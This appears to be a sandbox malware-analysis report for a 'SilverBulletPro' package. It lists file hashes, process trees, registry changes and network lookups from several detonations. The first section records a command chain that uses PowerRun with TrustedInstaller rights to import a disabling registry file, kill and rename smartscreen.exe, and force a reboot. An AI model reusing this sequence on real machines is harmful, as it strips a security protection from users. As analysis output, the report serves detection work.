C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" regedit.exe /s "DisablerS\Disable.reg"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im smartscreen.exe
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ regedit.exe /s "DisablerS\Disable.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "DisablerS\Disable.reg"
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c move /y "C:\Windows\System32\smartscreen.exe" "C:\Windows\System32\smartscreen.plm"
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" cmd.exe /c move /y "C:\Windows\System32\smartscreen.exe" "C:\Windows\System32\smartscreen.plm"
C:\Windows\SysWOW64\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ cmd.exe /c move /y "C:\Windows\System32\smartscreen.exe" "C:\Windows\System32\smartscreen.plm"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c move /y "C:\Windows\System32\smartscreen.exe" "C:\Windows\System32\smartscreen.plm"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /f /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a18855 /state1:0x41c64e6d
Network
Files
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\Script_Run.bat
| MD5 | cb6ba01b02a759691ccce25812a01fbe |
| SHA1 | 3dc6450d1d0d92b34a8bbf891d5895d916dfa286 |
| SHA256 | 7799b4f070f70a1ba829e49dadbb4708a632d8db41510828b50b8826a669b6c3 |
| SHA512 | 871b05706dd8e9de355873236a592621e2a5dfca694154d2c86411499d0b2300cc6cfc7c62a8dd998ef901934349d725d34405250d6cbca49f9c9e63b316b126 |
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
| MD5 | fc1fb033d57f72089fb4762245a8b18d |
| SHA1 | 7ec0f7ca5f0e0d20e5372bf69865d0a809e6cc8e |
| SHA256 | a6fa768c4964c328c748558627c20c2ba455e589a1b87cfa3911d197da1688d2 |
| SHA512 | cff3833e592a5fe1f1fcb656c42e77fdd177c902f84cf396365cfa04edc9ec046de3473a943779d3815bc36bf48182101703b20b08ae580c2b3ba20508d231d0 |
C:\Windows\Temp\1x6b0a0i.tmp
| MD5 | 9e7bb9c31083cc3a0f561d12311c9d83 |
| SHA1 | 9102b88339566d5f0490c25180632043c8bb1809 |
| SHA256 | 2658178fd2cb498195032c531bf3bb037954e0614aaec4c4ac2637f08d949bc1 |
| SHA512 | 1fb30279a1f951a98f609eb749deb6c77082c28a30e1fdd4f3224ddac8ddfad134e8f3c44f82c32501da8a93a978e6cf8dfe591039a0e6af0d4d2a1dc5445699 |
C:\Users\Admin\AppData\Local\Temp\aut92B3.tmp
| MD5 | 96c0e61f3298cb745b021f67e7dd0d48 |
| SHA1 | a61adbe460c68a3087ff1ba75620dbb86af28e40 |
| SHA256 | 3e56c22a81ab1168036a289c7ffe2889dd678c422568dff9ef91d6a0f9005333 |
| SHA512 | dbbfdd4ad2c80ff9df0b21dfd011420baba54a7114d0e0ff5371dda9c9389d90422a4311881ac2bdb5ba7c4334d210b61c6c0fc691ae503e32930109d9251f3e |
C:\Users\Admin\AppData\Local\Temp\aut92B2.tmp
| MD5 | 09ca17eb552722bd7004097f59b07518 |
| SHA1 | 36cf9da188460542e58acb97fa0ef0bfd9a4e172 |
| SHA256 | 365c32c3c09228158ab5aaabfcf93cdfcd858be0b2a00031d82ab03070f61a5b |
| SHA512 | 3dc6ed86df50f87b12635032fb30840e94bea699ac193a16099a2ce1a9bd5e39147f115fb938c177991dc0dcfd5abab075632a1d0b46e6009a86eea3a27156bf |
C:\Users\Admin\AppData\Local\Temp\aut92B1.tmp
| MD5 | 4a83df1d945c2f5801ed59650d7460eb |
| SHA1 | 31827890e1df99268c0f80dcb26774225e4c3a5d |
| SHA256 | 2d993be76dfcf35f89b656b4dbc553e078d824974b482e56c6f76eaea87731c8 |
| SHA512 | eacb88683e3c999a1cdc9d9e4a4030723164e358d7cd85f7cfc02b99f33be991c89af5602349b48b5388520968a43a2a45b4b6d2f468f2b888088cf95bd591d2 |
C:\Windows\Temp\3x2b7a6i.tmp
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\DisablerS\Disable.reg
| MD5 | 201be895329261922e55ff75ad5da09b |
| SHA1 | 12ccc829a31f8242e90f4c13a48fcd1392b93c96 |
| SHA256 | 651c04fd23a4ce9fe3f0337157d4abdc999a5fb39c8ef9b1c9e92faa770254b8 |
| SHA512 | 8139cfc7701febebe46f609ea881cf1de180233b21c8209d7d9fcc0b046aefd54d123ac61463f8b5b697a1701c62d2aa81d9ea40aa71277b931e4ad30f738f41 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
131s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBullet.Parallelization.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240419-en
Max time kernel
130s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\iossimulator-arm64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240508-en
Max time kernel
75s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\iossimulator-x64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
75s
Max time network
92s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\maccatalyst-x64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
80s
Max time network
99s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\tvossimulator-x64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| IE | 52.111.236.22:443 | tcp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
81s
Max time network
98s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\runtimes\win-arm\native\e_sqlite3.dll,#1
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240508-en
Max time kernel
136s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \Registry\User\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\NotificationData | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5400310000000000a85824691000646f746e657400003e0009000400efbea8580a69a85824692e0000003961020000000500000000000000000000000000000064c42f0164006f0074006e0065007400000016000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe\shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe\shell\open | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe\shell\open\command\ = "\"C:\\Program Files\\dotnet\\dotnet.exe\" \"%1\"" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe\shell\open\command | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2988 wrote to memory of 5008 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\dotnet\dotnet.exe |
| PID 2988 wrote to memory of 5008 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\dotnet\dotnet.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.CLI.Core.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\dotnet\dotnet.exe
"C:\Program Files\dotnet\dotnet.exe" "C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.CLI.Core.pdb"
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
136s
Max time network
154s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe
"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/3852-0-0x00007FFE3E073000-0x00007FFE3E075000-memory.dmp
memory/3852-1-0x0000024B6DB40000-0x0000024B6E00E000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
140s
Max time network
156s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Tessernet\libtesseract500.dll,#1
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
131s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
